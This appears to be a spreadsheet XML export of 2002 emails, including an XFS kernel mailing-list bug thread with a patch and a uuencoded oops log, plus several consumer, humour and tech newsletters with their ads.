you automatically. You can also get it via the Web at:
  http://www.eff.org/pub/EFF/Newsletters/EFFector/current. html
++++++++++++++++++++++++
You received this message because eff-all@eff.org is a member of the 
mailing list originating from alerts@action.eff.org. To unsubscribe 
from all mailing lists originating from alerts@action.eff.org, send an 
email to alerts@action.eff.org with 'Remove' as the only text in the 
subject line.</t>
  </si>
  <si>
    <t>I did more testing with your patch on top of today's CVS, but the patch
didn't help at all.
The following is the results of the tests:Testing setup:
1. created a "/dev/md0" with 4 scsi disks
2. created a LVM Volume group "vg" with the "/dev/md0"
3. created a LVM logical volume "vol1" with "vg"
4. created a XFS fs with a command:
    mkfs.xfs -f -d sunit=8,swidth=8 /dev/vg/vol1
    -----------meta-data=/dev/vg/vol1           isize=256    agcount=8,
agsize=32767 blks
    -----------data     =                       bsize=4096   blocks=262136,
imaxpct=25
    -----------         =                       sunit=1      swidth=1 blks,
unwritten=0
    -----------naming   =version 2              bsize=4096
    -----------log      =internal log           bsize=4096   blocks=1200,
version=1
    -----------         =                       sunit=1 blks
    -----------realtime =none                   extsz=65536  blocks=0,
rtextents=0Test results:
1. mount with quota enabled =&gt; occasional kernel oops, attached the file
oops1
2. mount without quota enabled =&gt; occasional kernel oops, attached the file
oops2
3. mount without quota enabled, while md device is in degraded mode =&gt;
always kernel oops, attached the file oops3Thanks,JLee----- Original Message -----
From: "Eric Sandeen" 
To: "James Lee" 
Cc: ; 
Sent: Tuesday, August 13, 2002 3:03 PM
Subject: Re: kernel BUG at filemap.c:843!
&gt; Hi guys -
&gt;
&gt; We treat MD and LVM somewhat specially, and I wonder if in this case MD
&gt; is masking the fact that you're using LVM, and that might be where the
&gt; problem starts.
&gt;
&gt; Can you try this patch, which will cause LVM &amp; MD to be treated the
&gt; same, to see if it helps?  It's probably not the final solution, but it
&gt; might offer some hints.
&gt;
&gt; Thanks,
&gt;
&gt; -Eric
&gt;
&gt; --- linux/fs/xfs/pagebuf/page_buf_locking.c_1.24 Tue Aug 13 14:05:18 2002
&gt; +++ linux/fs/xfs/pagebuf/page_buf_locking.c Tue Aug 13 13:59:37 2002
&gt; @@ -198,7 +196,7 @@
&gt;   pagebuf_target_blocksize(target, PAGE_CACHE_SIZE);
&gt;
&gt;   if ((MAJOR(dev) == MD_MAJOR) || (MAJOR(dev) == EVMS_MAJOR))
&gt; - target-&gt;pbr_flags = PBR_ALIGNED_ONLY;
&gt; + target-&gt;pbr_flags = PBR_SECTOR_ONLY;
&gt;   else if (MAJOR(dev) == LVM_BLK_MAJOR)
&gt;   target-&gt;pbr_flags = PBR_SECTOR_ONLY;
&gt;   else
&gt;
&gt;
&gt;
&gt; On Mon, 2002-08-12 at 01:40, James Lee wrote:
&gt; &gt; Hi,
&gt; &gt;
&gt; &gt; I'm also having the exactly same problem.
&gt; &gt; Tested with 2.4.19-xfs(checked out from SGI's CVS on Aug 10) on Redhat
7.2.
&gt; &gt; Kernel and userland tools are compiled with gcc 2.91.66
&gt; &gt; The following is the result of some tests:
&gt; &gt;
&gt; &gt; scsidisks -&gt; xfs: OK
&gt; &gt; scsidisks -&gt; raid5 -&gt; xfs: OK
&gt; &gt; scsidisks -&gt; lvm -&gt; xfs: OK
&gt; &gt; scsidisks -&gt; raid0 -&gt; lvm -&gt; xfs: OK
&gt; &gt; scsidisks -&gt; raid1 -&gt; lvm -&gt; xfs: OK
&gt; &gt; scsidisks -&gt; raid5 -&gt; lvm -&gt; xfs: kernel BUG at filemap.c:843!
&gt; &gt;
&gt; &gt; This problem is always reproducible with the following shell script:
&gt; &gt;
&gt; &gt;         #!/bin/sh
&gt; &gt;         mkraid /dev/md0
&gt; &gt;         vgcreate VolumeGroup /dev/md0
&gt; &gt;         lvcreate -L1G -nTestVolume VolumeGroup
&gt; &gt;         mkfs.xfs -f -d size=32m /dev/VolumeGroup/TestVolume
&gt; &gt;         mount -t xfs /dev/VolumeGroup/TestVolume
&gt; &gt; /mnt -onoatime,nodiratime,usrquota,grpquota
&gt; &gt;
&gt; &gt; Whenever I run the above script, mount command always generates kernel
oops.
&gt; &gt; But, if I insert some delay as of the following, then mount goes well:
&gt;
&gt;
&gt; --
&gt; Eric Sandeen      XFS for Linux     http://oss.sgi.com/projects/xfs
&gt; sandeen@sgi.com   SGI, Inc.         651-683-3102
begin 666 oops1.dat
M=&amp;5S=&amp;5D.B R+C0N,3DM&gt;&amp;9S("A31TDG7-T96T@8W)E871E9"!O;B!T;W @;V8@
M3%9-("L@340L('-O;65T:6UE6UO;W!S(#(N-"XQ(&amp;]N(&amp;DV.#8@,BXT+C$Y+B @3W!T:6]N6UB;VP@:6YF;W)M871I;VXN("!)
M('=I;&amp;P*87-S=6UE('1H870@=&amp;AE(&amp;QO9R!M871C:&amp;5S('1H92!K97)N96P@
M86YD(&amp;UO9'5L97,@=&amp;AA="!A6UO;W!S("UT(&amp;5L9C,R+6DS.#8@
M+6$@:3,X-@I%1DQ!1U,Z(# P,#$P,C0V"F5A&gt;#H@8S$Y969B-# @("!E8G@Z
M(&amp;,P,V$W9#$T(" @96-X.B P,# P,# Q-B @(&amp;5D&gt;#H@,# P,# P,# *97-I
M.B!C,6,P,&amp;5C8R @(&amp;5D:3H@9C5F,F9F,C @("!E8G Z(# P,# P,# Q(" @
M97-P.B!F-6-D,3DY. ID2MA8R\Q,3 ^"E1R86-E.R!C,#(T-C4X.2 \&lt;&amp;%G96)U9E]I
M;W)E&lt;75E&amp;9S7W)E861?8G5F*S-E+V8P
M/@I4&amp;9S7W)E861S8BLX,"]C,#X*5')A8V4[(&amp;,P,C-B960T(#QX9G-?8VUO=6YT
M9G,K-37-T96U?8V%L;"LS,R\S.#X*0V]D93L@(&amp;,P,3)B9&amp;0V(#QU;FQO8VM?
M&lt;&amp;%G92LT-B\W,#X*,# P,# P,# @/%]%25 ^.@I#;V1E.R @8S Q,F)D9#8@
M/'5N;&amp;]C:U]P86=E*S0V+S&amp;9F9F9F9F5A*"5E8W@I+"5E8W@*0V]D93L@(&amp;,P
M,3)B9&amp;1C(#QU;FQO8VM?&lt;&amp;%G92LT8R\W,#X*(" @-CH@(" S-"!C," @(" @
M(" @(" @(" @(" @(" @('AO#0H)65S:2DL)65A&gt; I#;V1E.R @8S Q
M,F)D93$@/'5N;&amp;]C:U]P86=E*S4Q+S&amp;9S("A31TDG7-T96T@=VET:"!Q=6]T82!E;F%B;&amp;5D
M+"!C&amp;9S("UF("UD('-U;FET/3@L6]U(&amp;-A;B!G970*;6]R92!A8V-U'!L86EN#H@8S S83=D
M,30@("!E8W@Z(# P,# P,#$V(" @961X.B P,# P,# P, IE&amp;9S
M7V)U;&amp;MS=&amp;%T*S%B,R]B.# ^"E1R86-E.R!C,#%F,3,Y.2 \&gt;&amp;9S7W%M7W%U
M;W1A8VAE8VLK8SDO,34P/@I4&amp;9S7VUO=6YT
M9G,K9C!B+S$P,# ^"E1R86-E.R!C,#(S,S9B8B \&gt;&amp;9S7W)E861S8BLS8B]C
M,#X*5')A8V4[(&amp;,P,C,S-S P(#QX9G-? I#;V1E.R @8S Q,F)D9#D@/'5N;&amp;]C:U]P86=E*S0Y+S"DL)65C&gt; I#;V1E.R @8S Q,F)D9&amp;,@/'5N;&amp;]C:U]P86=E*S1C+S&amp;]R(" @("0P
M&gt;&amp;,P+"5A; I#;V1E.R @8S Q,F)D9&amp;4@/'5N;&amp;]C:U]P86=E*S1E+S"PP&gt;#0H)65S:2D*0V]D93L@(&amp;,P,3)B9&amp;4T(#QU;FQO8VM?&lt;&amp;%G92LU-"\W
M,#X*(" @93H@(" W-" Q," @(" @(" @(" @(" @(" @(" @(&amp;IE(" @(" R
M," \7T5)4"LP&gt;#(P/B!C,#$R8F1F-B \=6YL;V-K7W!A9V4K-C8O-S ^"D-O
M9&amp;4[("!C,#$R8F1E-B \=6YL;V-K7W!A9V4K-38O-S ^"B @,3 Z(" @-6(@
M(" @(" @(" @(" @(" @(" @(" @("!P;W @(" @)65B&gt; I#;V1E.R @8S Q
M,F)D93&lt;@/'5N;&amp;]C:U]P86=E*S4W+S I#;V1E.R @8S Q,F)D
M93D@/'5N;&amp;]C:U]P86=E*S4Y+S&amp;]R(" @("5E87@L*"5E87@I"@H*-B!W87)N:6YG2!N;W0@8F4@&amp;9S("A31TDG7-T96T@8W)E871E9"!O;B!T;W @;V8@
M3%9-("L@340L('=H:6QE($U$(&amp;ES(&amp;EN(&amp;1E9W)A9&amp;5D(&amp;UO9&amp;4@86QW87ES
M(&amp;=E;F5R871E&amp;9S("UF("UD('-U;FET/3@L6UO;W!S(#T]/3T]
M/3T]/3T]/3T]/3T]/3T]/0IK6US("AD969A=6QT*0H@(" @("UL("]P6US(&amp;5T8RX@(&amp;MS&gt;6UO;W!S("UH(&amp;5X&lt;&amp;QA:6YS('1H92!O
M&lt;'1I;VYS+@H*:V5R;F5L($)51R!A="!F:6QE;6%P+F,Z.#0S(0II;G9A;&amp;ED
M(&amp;]P97)A;F0Z(# P,# *0U!5.B @(" P"D5)4#H@(" @,# Q,#I;/&amp;,P,3)B
M9&amp;0V/ET@(" @3F]T('1A:6YT960*57-I;F&lt;@9&amp;5F875L=',@9G)O;2!K#H@,# P,# P,38@
M("!E9'@Z(# P,# P,# P"F5S:3H@8S%C,#)A8S@@("!E9&amp;DZ(&amp;5F,#EE96,P
M(" @96)P.B P,# P,# P,2 @(&amp;5S&lt;#H@968P-F9A-&amp;,*9',Z(# P,3@@("!E
M2MA8R\Q,3 ^"E1R86-E.R!C,#(T-C4X.2 \&lt;&amp;%G96)U
M9E]I;W)E&lt;75E&amp;9S7W)E861S8BLR,2]C
M,#X*5')A8V4[(&amp;,P,C-B9#1E(#QX9G-?8VUO=6YT9G,K,V5E+S8Q,#X*5')A
M8V4[(&amp;,P,C-C,#!B(#QX9G-?;6]U;G0K-&amp;(O-C ^"E1R86-E.R!C,#(T968R
M-B \;&amp;EN=F9S7W)E861? I#;V1E.R @8S Q,F)D9#D@/'5N;&amp;]C:U]P86=E
M*S0Y+S"DL)65C&gt; I#;V1E.R @8S Q,F)D9&amp;,@/'5N
M;&amp;]C:U]P86=E*S1C+S&amp;]R(" @("0P&gt;&amp;,P+"5A; I#;V1E.R @8S Q,F)D9&amp;4@/'5N;&amp;]C
M:U]P86=E*S1E+S"PP&gt;#0H)65S:2D*0V]D93L@(&amp;,P,3)B9&amp;4T(#QU
M;FQO8VM?&lt;&amp;%G92LU-"\W,#X*(" @93H@(" W-" Q," @(" @(" @(" @(" @
M(" @(" @(&amp;IE(" @(" R," \7T5)4"LP&gt;#(P/B!C,#$R8F1F-B \=6YL;V-K
M7W!A9V4K-C8O-S ^"D-O9&amp;4[("!C,#$R8F1E-B \=6YL;V-K7W!A9V4K-38O
M-S ^"B @,3 Z(" @-6(@(" @(" @(" @(" @(" @(" @(" @("!P;W @(" @
M)65B&gt; I#;V1E.R @8S Q,F)D93&lt;@/'5N;&amp;]C:U]P86=E*S4W+S I#;V1E.R @8S Q,F)D93D@/'5N;&amp;]C:U]P86=E*S4Y+S&amp;]R(" @("5E87@L*"5E87@I
M"@H]/3T]/3T]/3T]/3T]/3T]/3T]/3T]/3T]/3T]/3T]/3T]/3T]/3T]/3T]
+/3T]/3T]/3T]/0H`
`
end</t>
  </si>
  <si>
    <t>use Perl Daily NewsletterIn this issue:
    * TPJ Ceases Publication+--------------------------------------------------------------------+
| TPJ Ceases Publication                                             |
|   posted by hfb on Friday August 16, @21:17 (news)                 |
|   http://use.perl.org/article.pl?sid=02/08/17/0118230              |
+--------------------------------------------------------------------+[0]TorgoX writes "Bad news, folks: [1]SysAdmin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can't keep doing that. So the issue
that's in the mail now is apparently [2]the last."Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/08/17/0118230Links:
    0. http://%7Bsburke%7D%20%7Bat%7D%20%7Bcpan.org%7D
    1. http://www.sysadminmag.com/
    2. http://www.sysadminmag.com/tpj/images/covers/issue25.jpgCopyright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</si>
  <si>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LIFETIME MOVIE NEWSLETTERThis Week's Movies to Watch on Lifetime[ http://www.lifetimetv.com/movies/index.html ]August 19, 2002*************************************************************************COMING AT YOU THIS WEEK...1) "THE SECRET LIFE OF ZOEY" PREMIERE!
2) THE BUZZ ABOUT THE UPCOMING MOVIE
3) MOVIES AIRING THIS WEEK
4) BIG EVENT: A MARTINEZ SUNDAY
5) FUN AND GAMES*************************************************************************"THE SECRET LIFE OF ZOEY" PREMIERE!Take a sneak peek at Lifetimeï¿½s next exciting Original Movie, "The Secret Life of Zoey" [ http://www.lifetimetv.com/movies/info/move3195.html ], airing on Monday, August 19 at 9 pm et/pt. Zoey's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TV's "Once and Again." Go behind the scenes with the cast [ http://www.lifetimetv.com/movies/originals/bio1.html ],
read real-life recovery stories of teen drug addicts [ http://www.lifetimetv.com/reallife/health/features/teen_addiction.html ], and learn how to keep your kids drug-free with 10 expert tips [ http://www.lifetimetv.com/reallife/health/features/drug_free.html ].*************************************************************************THE BUZZ ABOUT THE UPCOMING MOVIEPeople are already talking about the sensitive subject of kids and drug addiction featured in "The Secret Life of Zoey."
Lifetimetv.com community member BELFAST BELLE writes:
"My belief is that I started using drugs to fit in and to cope with things that happened to me. My mom died when I was 10. I had to live away from my dad and brothers. Where I grew up I was sexually abused for years, but I didn't dare tell anyone. When I finally went to live with my dad and brothers, I had no self-esteem left. I experienced so much shame, and in my mind it seemed as if everyone knew what happened. Drugs helped me to feel OK and like I was a part of something. When my dad died, I was devastated. It threw me into a full-blown addiction. My drug use landed me in rehab, in debt and in strained relationships with my brothers. Thanks to the help of Narcotics Anonymous, I have been clean since December 28, 1991. I now have great relationships with my siblings. I love them more than they will ever know. I also have a beautiful seven-year-old daughter who has never seen her mother touch drugs. I don't have any desire to use, either -- just the desire to be the best pe
 rson I can be."Express yourself! Tell us your thoughts on "The Secret Life of Zoey" and let us know if addiction has affected your life. Go to our Message Boards at http://boards.lifetimetv.com/WebX?14@@.ee91dd6.*************************************************************************MOVIES AIRING THIS WEEK"The Wrong Woman," premiering August 20 at 9 pm et/pt
Melanie is flirting with a married man -- her boss. When he turns up dead, she is framed for his murder! Will the victim's wife help save Melanie from jail? Starring "The Division" star Nancy McKeon [ http://www.lifetimetv.com/shows/ip/portraits/0023/0023_index.html ].
[ http://www.lifetimetv.com/movies/info/move2355.html ]"Hit and Run," airing August 21 at 9 pm et/pt
Joanna is the ideal mother, wife and friend. But her "perfect" life is altered forever when she accidentally hits a young girl with her car and leaves the scene. What catches up with her first -- her conscience or the police? Starring "The Division" star Lisa Vidal
[ http://www.lifetimetv.com/shows/division/bios/cast_lisa.html ].
[ http://www.lifetimetv.com/movies/info/move2518.html ]"Get to the Heart: The Barbara Mandrell Story," premiering August 22 at 9 pm et/pt
Barbara Mandrell plays herself in this inspiring autobiographical movie about the country-western singer's rise to fame and the car crash that nearly killed her. Also starring Dolly Parton and Kenny Rogers. Find out more about this Grammy-winning crooner [ http://www.lifetimetv.com/shows/ip/portraits/9837/9837_index.html ].
[ http://www.lifetimetv.com/movies/info/move3180.html ]"Road Rage," airing August 23 at 9 pm et/pt
It's just another day on the freeway for Ellen Carson, until she innocently cuts off Eddie, a short-tempered delivery driver who is upset over recent deaths in his family. Then Ellen and her loved ones become the stalking targets of Eddie's violent wrath. Starring Yasmine Bleeth.
[ http://www.lifetimetv.com/movies/info/move3002.html ]*************************************************************************BIG EVENT: A MARTINEZ SUNDAY
Tune in on Sunday, August 25, for a day filled with movies showcasing heartthrob A Martinez, who stars in Lifetime's exciting new legal series, "For the People" [ http://www.lifetimetv.com/shows/ftpeople/index.html ]."She-Devil," airing August 25 at 12 pm et/pt
When Ruth's husband, Bob, leaves her for another woman, Ruth devises a devious plot to ruin both their lives piece by piece. It's a face-off between Roseanne Barr and Meryl Streep!
[ http://www.lifetimetv.com/movies/info/move1455.html ]"Manhunt: Search for the Night Stalker," airing August 25 at 2 pm et/pt
This true story recalls how famed serial killer Richard Ramirez terrorized Los Angeles for six months by murdering people in their own homes. See how the cops finally caught this vicious criminal.
[ http://www.lifetimetv.com/movies/info/move1881.html ]"Sweet Dreams," airing August 25 at 4 pm et/pt
She wakes up from a coma and nothing is as it seems. Will she regain her memory and realize that her husband and his mistress are out to get her? Starring Tiffani-Amber Thiessen.
[ http://www.lifetimetv.com/movies/info/move2676.html ]"Cruel Justice," airing August 25 at 6 pm et/pt
After his daughter's rapist is set free by the courts, a father seeks justice on his own terms.
[ http://www.lifetimetv.com/movies/info/move3023.html ]***********************************************************************FUN AND GAMES
Think you're ultimate film fanatic? Prove it! Play Cinema Sequence and see if you really know all the star facts and flick stats [ http://www.lifetimetv.com/movies/games/cinemaseq/index.html ].***********************************************************************SUBSCRIPTION INFORMATION FOR THE LIFETIME MOVIE NEWSLETTERPlease do not reply to this e-mail; it's automatically generated, and this mailbox is not read by anyone. Therefore you will not get a response. If you wish to be removed from the Lifetime Movie Newsletter mailing list, please send an e-mail to unsubscribe-movies@email.lifetimetv.com.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t>
  </si>
  <si>
    <t xml:space="preserve">____________________________________________________________ T H E . M O U T H P I E C E  Monday, August 19th, 2002 
____________________________________________________________ 
Do you enjoy this publication? Then give your friends a FREE 
GIFT SUBSCRIPTION to it today. Just click below and 
"Shag-a-Friend"! 
http://www.sendoutmail.com/shag_friend2.asp?l=mouthpiece
Give a Gift Subscription! 
____________________________________________________________ To SUBSCRIBE: http://www.shagmail.com/sub/mouthpiece.html 
To UNSUBSCRIBE: http://www.shagmail.com/unsub/mouthpiece.html 
To COMMENT, write to &lt; editor@the-mouth.com &gt;                      AOL Links: 
Subscribe
Unsubscribe
Email the Editor 
____________________________________________________________ 
[m]  q u o t e s . o f . t h e . d a y "A Houston woman has been arrested for running over her 
husband three times and killing him with her Mercedes.  The 
woman claims it was an accident. Three times.  That shows you 
what a smooth ride the Mercedes is."
	-Jay Leno"Itï¿½s been reported that the couple from ABCï¿½s reality show 
"The Bachelor," has broken up.  Itï¿½s not surprising since 
studies show that 60% of fake TV marriages end in divorce."
	-Conan O'Brien"You know 'that look' women get when they want sex? Me 
neither."
	-Steve Martin~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ sponsor ~~~~ 
      Say Goodbye To Pain...It's As Easy As 1-2-3!
   * -   COMPARE &amp; SAVE $20.00 to the TV Product   - *Don't let chronic pain stop you from enjoying life! Introducing 
New and Improved Blue Ease Pain Reliever. You've seen similar 
products selling on TV for as much as $39.99. Why pay that 
much when you can get better results for half the price? 
Simply apply Blue Ease to the targeted area and within 
minutes the pain vanishes. Blue Ease is Great For:* Arthritis             * Insect stings/Spider bites
* Lower back pain       * Migraine Headaches
* Sore muscles          * Knee, hip, shoulder, hand pain
* Burns &amp; Sunburn       * Sports injuries, strains &amp; sprainsPLUS, Blue Ease is GUARANTEED to work for you! If it doesn't
just return the unused portion for a refund. Order a 4 oz jar 
today for only $19.99, a savings of $20.00, by visiting: 
http://pulsetv.com/dw/blue.asp?aid=586&amp;ent=696&amp;email=mothlight@fastmail.fm
Blue Ease  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [m] h u m o r . s i t e s 
    ^^^^^^^^^^^^^^^^^^^^^ BUG REVIEWThis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house.http://www.urbanext.uiuc.edu/bugreview/index.html-&lt;&gt;-MYSTERY PHOTOVisit each week to see if you can identify the object(s) in 
the mystery photo. It may be a close-up of some ordinary object 
or setting, or something photographed at an odd angle or in an 
unusual setting, or some unusual object. If you think you know what it is, enter your answer in our 
drawing.  A winner will be chosen each week from among the 
correct entries. http://www.mysteryphoto.com~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ sponsor ~~~~ 
     An Exquisite Genuine Blue-Topaz Necklace for FREE? UNBELIEVABLE! While supplies last, we are giving away these 
stunning Genuine Blue Topaz Necklaces - FREE! (you cover the 
s&amp;h of $4.97)! This exquisitely cut Blue Topaz stone will make heads turn. A 
stunning pendant that is accented by a stylish, 18" manmade 
gold chain, this gorgeous necklace makes a wonderful gift for 
a friend - or especially for yourself!BUT YOU MUST ACT RIGHT NOW! Due to an overwhelming response to 
this FREE offer there's no telling when our inventory will run 
out. Sorry -- limit 4 per order. GET YOUR FREE NECKLACE NOW: 
         http://ads.pulsetv.com/al/a?aid=586&amp;ent=183 
Click Here 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [m]  b i t s . n . b o b s 
     ^^^^^^^^^^^^^^^^^^^^^ Things You'll Never Hear A Man Say...1. I just love how Barry Manilow sings, don't you?
2. No, I don't want another beer. I have to work tomorrow.
3. You know, her breasts are just too big for my liking.
4. Sometimes I just want to be held.
5. Boy, that Barbara Walters on "20/20" is one sexy babe.
6. Sure, honey! I'd be happy to discuss the state of our 
   relationship.
7. We haven't been to the mall for ages. Let's go shopping and 
   I can hold your purse.
8. Forget Monday Night Football. Let's watch something 
   meaningful on the "Lifetime Channel."
9. It's late. Put your clothes back on and I'll take you home.
10. Honey, I'm going to the store. Do you need more tampons?
11. Actually, I prefer it when *you* hold the remote.
12. I'm sick of beer. Give me a fruit juice.
13. Great! Your mother's coming to stay with us again.
14. I wonder if my gorgeous neighbour knows that her drapes are 
   open when she's getting ready for bed. Maybe I should tell 
   her.
15. No way. You weeded the garden last week. It's my turn.
16. Better get rid of these old Playboy magazines. I don't 
   look at them any more.
17. I understand.
18. This movie has way too much gratuitous nudity.
19. Damn, we're late for church!
20. No! I don't want to see your sister's breasts.
21. Damn these onions, pass me a tissue.
22. Put some panties on, for Pete's sake.
23. Eat something! You are starting to look like a Victoria's 
   Secret Model!
24. Don't pick that up, I got it.
25. Happy Anniversary!
26. Hey, isn't today your Mother's birthday?
27. Let's talk. I miss talking.
28. Gay men have rights too!
29. I am just too tired to have sex again today!
30. Are you losing weight, sweetie?
_________________________________________________________ 
LINKS FOR AOL MEMBERS Today's Humor Sites: 
BUG REVIEW
MYSTERY PHOTO------------------------------------------------------------ 
t h e . m o u t h p i e c e SUBSCRIBE/UNSUBSCRIBE instructions are at the TOP of this 
issue. 
____________________________________________________________ END OF THE MOUTHPIECE - Another FREE ShagMail publication   FREE fun in your mailbox every day!! Check out Shagmail.com 
FREE Newsletters Copyright 2002 by Pulse Direct, Inc. All rights reserved. 
Feel free to forward this, in its entirety, to others. ---
You are currently subscribed to mouthpiece as: mothlight@fastmail.fm
</t>
  </si>
  <si>
    <t>&lt;!--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20020819 Lockergnome Tech Specialist
Â  08.19.2002 GnomeREPORT 
180 MUST-KNOW TECH TERMS Anyone who's ever been asked to explain a 
tech term only to be left stumbling through a plausible explanation will 
appreciate this eBook. From relevant computing personalities, to obscure 
tech references, to clear descriptions of day-to-day definitions you may 
already know (but not know how to define). These 180 definitions will leave 
you talking the talk of the office geek without giving up your entire social 
calendar to extended sessions in front of a CRT. Even with the refresh rate 
bumped up to 100Hz. 
Download This Tech-Glossary Today!When I was in Omaha a couple of weeks ago, I made the 
unfortunate mistake of driving through the intersection of 
90th and Dodge. Those of you in Omaha know what sorts of 
things I was muttering under my breath during the ordeal. Is 
it possible to suffer from road rage when you're not moving? 
Omaha has started a 10 
year project on Dodge street, which more or less divides 
the city in half east to west. The traffic tie-ups due to 
the construction disaster at 90th and Dodge are being felt 
by nearby businesses. A bank 
is fighting back in a creative way, replacing random $20 
and $10 bills in their ATM machine with $50 and $20 notes 
respectively to reward lucky customers for their patronage. 
And I just drove right by the place.The route to Des Moines from Waterloo isn't much better 
right now as they widen highway 330/65 to 4 lane between 
Marshalltown and Des Moines. Once that's done, it will cut 
20-30 minutes from the trip, and judging from the progress 
they've been making, it won't be too much longer. That's 
probably the fastest moving highway construction I've seen 
during my travels throughout Iowa over the years. As you 
travel to Gnomedex 
from all manner of locales, be sure to keep tabs on 
construction at this handy 
site put up by the Iowa Department of Transportation. See You in Des Moines,Â Â Â Â Â Â Â Â Â Â Â Â Â Â Randy NielandÂ Â Â Â Â Â Â Â GnomeNETWORK
Microsoft L2TP/IPSec VPN Client
http://www.microsoft.com/windows2000/server/evaluation/news/bulletins/l2tpclient.asp
Microsoft L2TP/IPSec VPN Client is a free download that 
allows computers running Windows 98, Windows Millennium 
Edition (Me), or Windows NTï¿½ Workstation 4.0 to use Layer 
Two Tunneling Protocol (L2TP) connections with Internet 
Protocol security (IPSec). The combination of L2TP and 
IPSec, known as L2TP/IPSec, is a highly secure technology 
for making remote access virtual private network (VPN) 
connections across public networks such as the Internet. 
Microsoft L2TP/IPSec VPN Client also provides support for 
IPSec Network Address Translator (NAT) traversal.
Â GnomeSYSTEM
Iomega Intros 750MB Zip
http://www.iomega.com/zip
I've all but ditched Zip drive use entirely due to cost 
and small capacity. I know many people that still use Zip 
drives, and I still play with a 1GB Jaz drive from time to 
time, but with the ease and low cost of CD-RW drives and 
media, Zip just hasn't stood a chance. Now that Iomega has 
bumped the capacity to 750MB, employed USB 2.0 and pushed 
the speed of the drives significantly higher, maybe it's 
still worth a look for those that need a fast removable 
media option. I'll stick with CD-RW myself. I'll sacrifice 
some speed for the reliability of optical media. But that's 
just me.
Â GnomeALERTZ
Today's Top 5 kbAlertzQ241122 - WINUP- Illegal Operation or Application Error when clicking on Product Updates (Q241122)
Q212713 - WD2000: Run-Time Error 5868 Using VBA Macro to Resize Document Window (Q212713)
Q212723 - WD2000: Run-Time Error 5841 If Style Doesn't Exist (Q212723)
Q212722 - WD2000: Compile Error If VBA Code Doesn't Find Comments (Q212722)
Q326537 - OFFXP: Smart Tags for Names, Telephone Numbers, Addresses, and Stock Symbols Do Not Appear As Expected (Q326537)KILL BANNERS AND POPUPS DEAD Banner Zapper is a utility that 
automatically removes 100% of unsolicited popup ads with 
Internet Explorer (version 4.0 and above), any banner windows coming 
with free or low-cost services such as dial-up Internet access, and 
all popup ads with Netscape Navigator (all versions). Version 3.0 enhances 
many of the functionalities from previous versions and includes additional 
special support for Internet Explorer.
Download Your Free Trial Now!
Recommend It!
Â GnomeASSISTANT
Technical Overview of .NET File Services
http://www.microsoft.com/windows.netserver/techinfo/overview/file.mspx
.NET Server is more than Windows 2000 with a look of 
Windows XP, of that you can be sure. Common sense has 
finally won, with the developers delivering many more 
command line tools to manage core services. Of course, this 
isn't the only thing being brought to the .NET table. 
Improvements in DFS, defrag, chkdsk and EFS just scratch the 
surface. New WHQL processes are being established for 
antivirus products, allowing them to hook directly into the 
OS. Virtual Disk Service, Volume Shadow Copy Service and 
promised improvements in the File Replication Service should 
make managing storage easier and more flexible. Â GnomeSTUFF
P4 Performance Goes to Court
http://www.pcworld.com/news/article/0,aid,104075,tk,dn081602X,00.asp
A class action lawsuit has been filed in California by a 
small group of PC owners that are miffed about the 
performance, or lack thereof, that was promised by Intel, HP 
and Gateway. Since the day the P4 was introduced, the 
overall performance has been criticized, so this would seem 
to be more an issue of failing to do proper due diligence on 
the part of the customer, if you ask me. This is one of 
those subjective questions that will come down to fancy 
lawyers and luck of the jury pool draw. If they believed 
everything the TV commercials had to say, then the litigants 
got what they had coming. One beer tastes better than the 
next, only one car can save your life in a crash, etc. This 
general lag in P4 muscle has been publicized since day one, 
as have crash test results on the part of the government and 
third-party organizations. Should we be suing auto makers 
when someone dies in a 5-star rated vehicle? That Volvo will 
save your life, ya know. Does this set an unreasonable 
expectation? Only if you consider advertising an education. Recommend It!http://www.lockergnome.com/issues/techspecialist/20020819.html
Your subscribed e-mail address is: [mothlight@fastmail.fm] - To unsubscribe or change your delivery address, please visit the subscription management page. For further information, please refer to the GnomeCREDITS in the sidebar.LOOK OVER HEREÂ Download Tip eBooksÂ Latest Windows Daily
Â Latest Digital Media
Â Latest Tech Specialist
Â Latest Penguin Shell
Â Latest Apple Core
Â Latest Web Weekly
Â Latest Bits &amp; Bytes
Â Latest Audio ShowÂ Low Price Search
Â Our Tech ConferenceÂ Microsoft Office Tips
Â PC Productivity Tips
Â Cool Internet Tips
Â Windows 2000 Tips
Â Windows XP TipsÂ Tell a Friend About Us!
Â Suggest a Feature
Â Advertise With Us
Â High-Tech Job Search
Â Chat With Gnomies
Â Watch The Webcams
Â Computer Power UserÂ Read Past Issues
Â Download X-Setup
Â About Lockergnome
Â Our Privacy Policy
Â View More Options
Â Our XML / RSS Feed
Â Syndicate Our Tips
Â Link To Lockergnome
Â Get Chris's Book
Â E-mail a Suggestion
Â Your Rant / Rave
Â General Feedback
Â The Editor's Blog
Â E-mail the Editor
Â SOUND SYSTEMS
Yamaha RX-V1200
Sony DAVC900
Harman Kardon	AVR520
Denon	AVR5803
Pioneer VSXD811S
Pioneer Elite	VSX49TX
Sony HTDDW840
Yamaha HTR5560
BOSE LS122BK
Sony DAVC450Â GNOMESPECIALS
Â Manage Your Workgroup
Â Form Pilot
Â Say the Time 5.0
Â Boomer - Stream Now
Â Create Web/CD catalog
Â Easy Web Editor
Â Kleptomania
Â Tag&amp;Rename
Â Pretty Good Solitaire
Â Visualize Color Combos
Â FirstStop WebSearch
Â Ecobuilder
Â Book Collector
Get Listed Here
Question: which group is 250,000+ strong and always looking for stuff to make their personal and professional lives run smoother? 
Â 
CLICK HERE TO ZOOM
Dr. Speed MemRxExcellent tool for optimizing Windows based computers. Runs quietly in the background working to optimize and speed up your computer!
buyÂ 
LOOK IT UPÂ 
BYTE ME NOWÂ©2002, Lockergnome LLC. ISSN: 1095-3965. All Rights Reserved. Please read our Terms of Service. Our Web site is hosted by DigitalDaze. Domain registered at DNS Central.</t>
  </si>
  <si>
    <t xml:space="preserve">        Forgotten History - Tuesday, August 20, 2002 
        "Little known facts and overlooked history" 
============================================================ 
Want to become a Forgotten History subscriber for FREE? Visit: 
           http://www.shagmail.com/sub/history.html 
============================================================ 
